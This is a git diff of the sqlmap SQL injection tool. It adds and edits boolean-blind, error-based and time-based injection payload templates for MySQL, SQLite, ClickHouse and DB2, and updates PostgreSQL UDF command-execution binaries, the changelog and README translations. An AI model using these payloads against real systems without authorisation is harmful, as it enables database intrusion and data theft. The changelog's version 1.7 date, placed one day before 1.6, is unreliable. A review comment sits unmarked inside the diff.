Binary files a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
index ee94408ecd4..21bbddcf59e 100644
Binary files a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
index 8a61270ca7a..9327b1cdba3 100644
Binary files a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
index b1258cbe9a4..a9874449464 100644
Binary files a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
index 2c2e96ca70a..e4b124fc8b3 100644
Binary files a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
index 2db355e267e..2c22afae9a2 100644
Binary files a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
index 1335862f761..ab23ee6a749 100644
Binary files a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
index bb2b6f195b5..8dae29c8336 100644
Binary files a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
index c730910de82..e5d05fc6f16 100644
Binary files a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
index 6ddad36fa41..ff31df61499 100644
Binary files a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
index 0f9bdf36280..d5576fdd8cf 100644
Binary files a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
index 0f54d5136c7..2350427f4ac 100644
Binary files a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
index a5bdf892ddc..eae84bdadd0 100644
Binary files a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
index bbe6aabf672..4a408a1ae0c 100644
Binary files a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
index a05e36e8c95..40f838b30f5 100644
Binary files a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
index 7a03c0d0def..a9b4b48c7b7 100644
Binary files a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
index eac654286bc..06aee54d778 100644
Binary files a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
index 6bfd62c07d4..67b5d34976f 100644
Binary files a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ
diff --git a/data/xml/errors.xml b/data/xml/errors.xml
index 59ae1e8e22a..4993a8ae81e 100644
--- a/data/xml/errors.xml
+++ b/data/xml/errors.xml
@@ -211,6 +211,11 @@
+
+
+
+
+
diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml
index 67cf9940d10..ae8b6de95f2 100644
--- a/data/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
@@ -484,18 +484,18 @@ Tag:
- MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
+ MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
1
5
1
1,2,3,8
1
- AND ([INFERENCE])*[RANDNUM]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
- AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
- AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL
@@ -503,18 +503,18 @@ Tag:
- MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
+ MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
1
5
3
- 1,2,3
+ 1,2,3,8
2
- OR ([INFERENCE])*[RANDNUM]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
- OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
- OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL
@@ -596,6 +596,45 @@ Tag:
Oracle
+
+
+ SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
+ 1
+ 2
+ 1
+ 1
+ 1
+ AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+ AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ SQLite
+
+
+
+
+ SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
+ 1
+ 3
+ 3
+ 1
+ 2
+ OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+ OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ SQLite
+
+
+
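Review bot: Both new SQLite test titles read `WHERE, HAVING, GROUP BY or HAVING clause (JSON)`, which names HAVING twice and does not match the wording used elsewhere in these payload files. The value that appears to be the clause field is `1` in both entries (the element names are not visible in this rendering, so this is inferred from field order). The DB2 test in error_based.xml with the same value is titled `WHERE or HAVING clause`. Suggest retitling to `SQLite AND boolean-based blind - WHERE or HAVING clause (JSON)` and the matching `OR` form, so the title reflects where the test is applied.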
diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml
index f9505522f38..9b1d2725ffe 100644
--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@@ -838,7 +838,7 @@
IBM DB2 OR error-based - WHERE or HAVING clause
2
4
- 1
+ 3
1
1
OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
@@ -853,6 +853,44 @@
+
+ ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+ 2
+ 3
+ 1
+ 1,2,3,9
+ 1
+ AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
+
+ ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+ 2
+ 4
+ 3
+ 1,2,3,9
+ 1
+ OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
index dfd9a2d2604..21a50ce4016 100644
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -195,9 +195,9 @@
2
1,2,3,8,9
1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -235,9 +235,9 @@
3
1,2,3,9
1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -276,9 +276,9 @@
2
1,2,3,9
1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
#
@@ -318,9 +318,9 @@
3
1,2,3,9
1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
#
@@ -1494,6 +1494,44 @@
+
+ ClickHouse AND time-based blind (heavy query)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
+
+ ClickHouse OR time-based blind (heavy query)
+ 5
+ 5
+ 3
+ 1,2,3
+ 1
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
@@ -1607,10 +1645,10 @@
5
2
1,2,3,9
- 1
- IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ 3
+ IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -1880,7 +1918,7 @@
4
2
1,2,3,9
- 1
+ 3
(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
@@ -1900,7 +1938,7 @@
5
2
1,2,3,9
- 1
+ 3
(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
diff --git a/data/xml/queries.xml b/data/xml/queries.xml
index deda4364d9c..28b5582fad2 100644
--- a/data/xml/queries.xml
+++ b/data/xml/queries.xml
@@ -207,7 +207,7 @@
-
+
@@ -228,7 +228,7 @@
-
+
@@ -261,11 +261,11 @@
-
+
-
+
-
+
-
+
-
+
-
+
-
+
@@ -302,7 +302,7 @@
-
+
@@ -606,7 +606,7 @@
-
+
@@ -621,7 +621,7 @@
-
+
@@ -631,24 +631,24 @@
-
+
-
+
-
+
-
+
@@ -656,7 +656,7 @@
-
+
@@ -679,8 +679,8 @@
-
-
+
+
@@ -747,10 +747,10 @@
-
-
-
-
+
+
+
+
@@ -770,7 +770,7 @@
-
+
@@ -778,11 +778,11 @@
-
+
-
+
@@ -875,8 +875,8 @@
-
-
+
+
@@ -938,10 +938,10 @@
-
-
-
-
+
+
+
+
@@ -962,11 +962,11 @@
-
+
-
+
@@ -975,11 +975,11 @@
-
+
-
+
@@ -1319,6 +1319,75 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md
index 1281080c040..a6c344a34e7 100644
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -1,3 +1,8 @@
+# Version 1.7 (2022-01-02)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
+
# Version 1.6 (2022-01-03)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
diff --git a/doc/THANKS.md b/doc/THANKS.md
index dc49071a915..3d5e9ec7e75 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -109,6 +109,9 @@ Alessandro Curio,
Alessio Dalla Piazza,
* for reporting a couple of bugs
+Alexis Danizan,
+* for contributing support for ClickHouse
+
Sherif El-Deeb,
* for reporting a minor bug
diff --git a/doc/translations/README-de-GER.md b/doc/translations/README-de-DE.md
similarity index 100%
rename from doc/translations/README-de-GER.md
rename to doc/translations/README-de-DE.md
diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md
index 02b7f378984..851ddd17522 100644
--- a/doc/translations/README-id-ID.md
+++ b/doc/translations/README-id-ID.md
@@ -2,21 +2,23 @@
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
-sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
+sqlmap adalah alat bantu proyek sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data.
+
+sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Alat ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
Tangkapan Layar
----

-Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
+Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
Instalasi
----
Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
-Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
+Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap):
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
@@ -25,26 +27,27 @@ sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi
Penggunaan
----
-Untuk mendapatkan daftar opsi dasar gunakan:
+Untuk mendapatkan daftar opsi dasar gunakan perintah:
python sqlmap.py -h
-Untuk mendapatkan daftar opsi lanjut gunakan:
+Untuk mendapatkan daftar opsi lanjutan gunakan perintah:
python sqlmap.py -hh
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
-Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Tautan
----
* Situs: https://sqlmap.org
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
-* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
-* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos)
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-in-HI.md b/doc/translations/README-in-HI.md
new file mode 100644
index 00000000000..623f1c7977e
--- /dev/null
+++ b/doc/translations/README-in-HI.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं।
+
+चित्रसंवाद
+----
+
+
+
+आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं।
+
+स्थापना
+----
+
+आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं।
+
+प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है।
+
+उपयोग
+----
+
+मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -h
+
+सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -hh
+
+आप [यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है।
+
+लिंक
+----
+
+* मुखपृष्ठ: https://sqlmap.org
+* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues
+* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki
+* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* ट्विटर: [@sqlmap](https://twitter.com/sqlmap)
+* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+*
diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RU.md
similarity index 100%
rename from doc/translations/README-ru-RUS.md
rename to doc/translations/README-ru-RU.md
diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md
new file mode 100644
index 00000000000..1adc31000cc
--- /dev/null
+++ b/doc/translations/README-sk-SK.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
+
+Snímky obrazovky
+----
+
+
+
+Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
+
+Inštalácia
+----
+
+Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
+
